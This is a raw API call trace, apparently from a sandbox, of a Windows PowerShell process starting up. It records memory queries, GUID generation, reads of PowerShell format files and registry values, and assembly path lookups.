	[0146.305] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.305] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.305] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.305] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x98134e7c, Data2=0xfd0a, Data3=0x46e0, Data4=([0]=0xae, [1]=0xb5, [2]=0xcb, [3]=0x7b, [4]=0x24, [5]=0x82, [6]=0xd7, [7]=0x9c))) returned 0x0
	[0146.306] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x1c54a7a3, Data2=0x8cfe, Data3=0x454d, Data4=([0]=0xa5, [1]=0x47, [2]=0xb0, [3]=0xe7, [4]=0xba, [5]=0x86, [6]=0xb6, [7]=0xf6))) returned 0x0
	[0146.306] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x2b6ce121, Data2=0x6dd9, Data3=0x4d51, Data4=([0]=0x88, [1]=0x56, [2]=0x44, [3]=0x1b, [4]=0x75, [5]=0xa0, [6]=0x7c, [7]=0xfc))) returned 0x0
	[0146.306] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xf57625ec, Data2=0xc85a, Data3=0x436a, Data4=([0]=0xb1, [1]=0x7a, [2]=0xe, [3]=0x4b, [4]=0x5d, [5]=0x3, [6]=0xac, [7]=0xe))) returned 0x0
	[0146.306] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6b654466, Data2=0x19a2, Data3=0x4b05, Data4=([0]=0xaa, [1]=0xbf, [2]=0x16, [3]=0xc3, [4]=0x96, [5]=0x34, [6]=0xf3, [7]=0xa4))) returned 0x0
	[0146.306] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x349998eb, Data2=0x4aee, Data3=0x4628, Data4=([0]=0xa4, [1]=0x5, [2]=0xd9, [3]=0xc, [4]=0xc, [5]=0x8b, [6]=0xa2, [7]=0x63))) returned 0x0
	[0146.307] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xa94afa13, Data2=0xd177, Data3=0x4d42, Data4=([0]=0xa9, [1]=0xd7, [2]=0xff, [3]=0x4a, [4]=0xdb, [5]=0x1a, [6]=0x46, [7]=0xf8))) returned 0x0
	[0146.307] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xdeb466fe, Data2=0x3a4a, Data3=0x47d7, Data4=([0]=0x82, [1]=0xf6, [2]=0xb3, [3]=0xd2, [4]=0x89, [5]=0xb, [6]=0xc8, [7]=0x80))) returned 0x0
	[0146.307] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe19d0cf6, Data2=0x8d73, Data3=0x4e29, Data4=([0]=0xaa, [1]=0x0, [2]=0x82, [3]=0xd6, [4]=0xaf, [5]=0xa5, [6]=0xda, [7]=0x73))) returned 0x0
	[0146.307] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xcea9bbd7, Data2=0x1114, Data3=0x446e, Data4=([0]=0xab, [1]=0xcd, [2]=0x71, [3]=0x4f, [4]=0x31, [5]=0xc8, [6]=0x36, [7]=0xa0))) returned 0x0
	[0146.307] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x78eafabe, Data2=0xcc2f, Data3=0x4272, Data4=([0]=0xb1, [1]=0x92, [2]=0xd7, [3]=0x91, [4]=0x25, [5]=0x25, [6]=0x94, [7]=0xa6))) returned 0x0
	[0146.307] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x9e7ad92f, Data2=0xc3a5, Data3=0x4c96, Data4=([0]=0x9d, [1]=0x98, [2]=0x6e, [3]=0xd7, [4]=0x28, [5]=0xe5, [6]=0x56, [7]=0x1d))) returned 0x0
	[0146.308] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x5aeb0c0a, Data2=0xfda7, Data3=0x4491, Data4=([0]=0xb6, [1]=0x4d, [2]=0x2a, [3]=0x46, [4]=0x9e, [5]=0xb2, [6]=0x3, [7]=0x5e))) returned 0x0
	[0146.308] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.308] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x62a166c7, Data2=0x79a6, Data3=0x42a9, Data4=([0]=0xa2, [1]=0xb6, [2]=0x16, [3]=0x3f, [4]=0x11, [5]=0xca, [6]=0x86, [7]=0x6c))) returned 0x0
	[0146.308] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.309] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.310] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x68fe2e5d, Data2=0x4c1d, Data3=0x411b, Data4=([0]=0xae, [1]=0x20, [2]=0xfd, [3]=0xd5, [4]=0x16, [5]=0x95, [6]=0x73, [7]=0x14))) returned 0x0
	[0146.310] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.310] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x70067445, Data2=0xfbb2, Data3=0x4298, Data4=([0]=0xb2, [1]=0x9e, [2]=0xd0, [3]=0x6c, [4]=0x4, [5]=0x3d, [6]=0xd2, [7]=0x58))) returned 0x0
	[0146.311] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x81cbe8eb, Data2=0x92a2, Data3=0x4383, Data4=([0]=0xbe, [1]=0x61, [2]=0xf5, [3]=0xd2, [4]=0xf2, [5]=0x69, [6]=0xa5, [7]=0xf3))) returned 0x0
	[0146.311] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x257f06d, Data2=0x90e8, Data3=0x402c, Data4=([0]=0xa9, [1]=0xcf, [2]=0xb6, [3]=0x4a, [4]=0x95, [5]=0x8b, [6]=0x72, [7]=0x2a))) returned 0x0
	[0146.311] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xf77704b5, Data2=0x6791, Data3=0x48f0, Data4=([0]=0x92, [1]=0x3d, [2]=0x85, [3]=0xf2, [4]=0x19, [5]=0xc9, [6]=0x64, [7]=0x0))) returned 0x0
	[0146.311] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xfdd75990, Data2=0xedc6, Data3=0x44b2, Data4=([0]=0xab, [1]=0xed, [2]=0x47, [3]=0xcd, [4]=0x7d, [5]=0xf8, [6]=0x73, [7]=0xb4))) returned 0x0
	[0146.311] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x81659c62, Data2=0xcf2b, Data3=0x46e5, Data4=([0]=0x8a, [1]=0x2f, [2]=0x6b, [3]=0xf8, [4]=0x4a, [5]=0x3c, [6]=0xf2, [7]=0x63))) returned 0x0
	[0146.312] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x82d326ee, Data2=0x758, Data3=0x4b4f, Data4=([0]=0x95, [1]=0x25, [2]=0x5b, [3]=0xd, [4]=0x92, [5]=0xc6, [6]=0xab, [7]=0x9c))) returned 0x0
	[0146.312] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.312] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x3065331d, Data2=0xacf0, Data3=0x41b0, Data4=([0]=0x8f, [1]=0xe, [2]=0xab, [3]=0x67, [4]=0xa6, [5]=0x48, [6]=0xa5, [7]=0x7f))) returned 0x0
	[0146.312] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x4d6a5495, Data2=0xb08, Data3=0x4bd6, Data4=([0]=0xaa, [1]=0xff, [2]=0x12, [3]=0x6f, [4]=0xef, [5]=0xba, [6]=0xd, [7]=0xd6))) returned 0x0
	[0146.313] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe2ef7434, Data2=0x9bb9, Data3=0x4ecb, Data4=([0]=0xb1, [1]=0xea, [2]=0x28, [3]=0x51, [4]=0xa9, [5]=0xab, [6]=0xb5, [7]=0xb9))) returned 0x0
	[0146.313] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe45a51a0, Data2=0xe995, Data3=0x4a25, Data4=([0]=0xb6, [1]=0x47, [2]=0x54, [3]=0xdf, [4]=0xcd, [5]=0xc7, [6]=0xcc, [7]=0xf1))) returned 0x0
	[0146.313] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xfee7b9a5, Data2=0xf35b, Data3=0x4e43, Data4=([0]=0x8a, [1]=0xe3, [2]=0xae, [3]=0x27, [4]=0xeb, [5]=0xab, [6]=0xdb, [7]=0x7))) returned 0x0
	[0146.313] VirtualQuery (in: lpAddress=0x1cba60, lpBuffer=0x1cc920, dwLength=0x30 | out: lpBuffer=0x1cc920*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.313] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xff498ecd, Data2=0xe8f5, Data3=0x4385, Data4=([0]=0xb2, [1]=0x93, [2]=0xd, [3]=0xe8, [4]=0xb7, [5]=0xaa, [6]=0xa9, [7]=0x5e))) returned 0x0
	[0146.314] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x6c41b4b5, Data2=0x9b1a, Data3=0x41d5, Data4=([0]=0xb5, [1]=0xf3, [2]=0x6a, [3]=0x8f, [4]=0x85, [5]=0xd3, [6]=0xc2, [7]=0x7b))) returned 0x0
	[0146.314] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.314] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.314] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.314] VirtualQuery (in: lpAddress=0x1cbad0, lpBuffer=0x1cc990, dwLength=0x30 | out: lpBuffer=0x1cc990*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.314] SetErrorMode (uMode=0x1) returned 0x1
	[0146.314] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0146.315] SetErrorMode (uMode=0x1) returned 0x1
	[0146.315] GetFileType (hFile=0x320) returned 0x1
	[0146.315] ReadFile (in: hFile=0x320, lpBuffer=0x320d4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320d4f8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.316] ReadFile (in: hFile=0x320, lpBuffer=0x320d4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320d4f8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.316] ReadFile (in: hFile=0x320, lpBuffer=0x320d4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320d4f8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.316] ReadFile (in: hFile=0x320, lpBuffer=0x320d4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320d4f8*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.316] ReadFile (in: hFile=0x320, lpBuffer=0x320d4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320d4f8*, lpNumberOfBytesRead=0x1ccdf8*=0x8b4, lpOverlapped=0x0) returned 1
	[0146.316] ReadFile (in: hFile=0x320, lpBuffer=0x320c914, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320c914*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0146.317] ReadFile (in: hFile=0x320, lpBuffer=0x320d4f8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x320d4f8*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0146.317] SetErrorMode (uMode=0x1) returned 0x1
	[0146.317] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe601915b, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x48b4)) returned 1
	[0146.317] SetErrorMode (uMode=0x1) returned 0x1
	[0146.317] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x320) returned 0x0
	[0146.317] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0146.317] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0c10
	[0146.317] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x1b7c0c10, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0146.318] CoTaskMemFree (pv=0x1b7c0c10) 
	[0146.318] RegCloseKey (hKey=0x320) returned 0x0
	[0146.318] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x466936bd, Data2=0xbdd8, Data3=0x4a6f, Data4=([0]=0xb3, [1]=0xbe, [2]=0x16, [3]=0x4, [4]=0x58, [5]=0x78, [6]=0x14, [7]=0xd5))) returned 0x0
	[0146.318] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xbd970e2e, Data2=0xdaa3, Data3=0x47fd, Data4=([0]=0xab, [1]=0xf8, [2]=0x93, [3]=0x5e, [4]=0x8f, [5]=0x20, [6]=0x98, [7]=0xb4))) returned 0x0
	[0146.319] SetErrorMode (uMode=0x1) returned 0x1
	[0146.319] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0146.319] SetErrorMode (uMode=0x1) returned 0x1
	[0146.319] GetFileType (hFile=0x320) returned 0x1
	[0146.319] ReadFile (in: hFile=0x320, lpBuffer=0x324b2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324b2e0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.320] ReadFile (in: hFile=0x320, lpBuffer=0x324b2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324b2e0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.320] ReadFile (in: hFile=0x320, lpBuffer=0x324b2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324b2e0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.321] ReadFile (in: hFile=0x320, lpBuffer=0x324b2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324b2e0*, lpNumberOfBytesRead=0x1ccdf8*=0x1000, lpOverlapped=0x0) returned 1
	[0146.321] ReadFile (in: hFile=0x320, lpBuffer=0x324b2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324b2e0*, lpNumberOfBytesRead=0x1ccdf8*=0xe98, lpOverlapped=0x0) returned 1
	[0146.321] ReadFile (in: hFile=0x320, lpBuffer=0x324a8e0, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324a8e0*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0146.321] ReadFile (in: hFile=0x320, lpBuffer=0x324b2e0, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x1ccdf8, lpOverlapped=0x0 | out: lpBuffer=0x324b2e0*, lpNumberOfBytesRead=0x1ccdf8*=0x0, lpOverlapped=0x0) returned 1
	[0146.321] SetErrorMode (uMode=0x1) returned 0x1
	[0146.321] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x1ccda0 | out: lpFileInformation=0x1ccda0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67eea05d, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67eea05d, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe603f2b9, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x4e98)) returned 1
	[0146.321] SetErrorMode (uMode=0x1) returned 0x1
	[0146.322] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x1cce88 | out: phkResult=0x1cce88*=0x320) returned 0x0
	[0146.322] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1cce0c, lpData=0x0, lpcbData=0x1cce08*=0x0 | out: lpType=0x1cce0c*=0x1, lpData=0x0, lpcbData=0x1cce08*=0x56) returned 0x0
	[0146.322] CoTaskMemAlloc (cb=0x5a) returned 0x1b7c0c10
	[0146.322] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0x1ccddc, lpData=0x1b7c0c10, lpcbData=0x1ccdd8*=0x56 | out: lpType=0x1ccddc*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0x1ccdd8*=0x56) returned 0x0
	[0146.322] CoTaskMemFree (pv=0x1b7c0c10) 
	[0146.322] RegCloseKey (hKey=0x320) returned 0x0
	[0146.322] VirtualQuery (in: lpAddress=0x1cb920, lpBuffer=0x1cc7e0, dwLength=0x30 | out: lpBuffer=0x1cc7e0*(BaseAddress=0x1cb000, AllocationBase=0x150000, AllocationProtect=0x4, __alignment1=0xfffff8a0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0146.323] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0xe844de24, Data2=0x63e3, Data3=0x4680, Data4=([0]=0xa9, [1]=0x19, [2]=0xf1, [3]=0x51, [4]=0x3c, [5]=0x55, [6]=0xe5, [7]=0xa6))) returned 0x0
	[0146.323] CoCreateGuid (in: pguid=0x1cd0b0 | out: pguid=0x1cd0b0*(Data1=0x14723d7a, Data2=0x2ada, Data3=0x447e, Data4=([0]=0xa9, [1]=0x3e, [2]=0xe6, [3]=0xdf, [4]=0xf7, [5]=0xb4, [6]=0x43, [7]=0x82))) returned 0x0
	[0146.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0146.415] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0146.424] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0146.425] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.WSMan.Management\\1.0.0.0__31bf3856ad364e35\\Microsoft.WSMan.Management.dll", lpFilePart=0x0) returned 0x70
	[0146.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.657] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0146.674] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0146.675] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Utility\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Utility.dll", lpFilePart=0x0) returned 0x86
	[0146.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0146.682] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x1cce50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
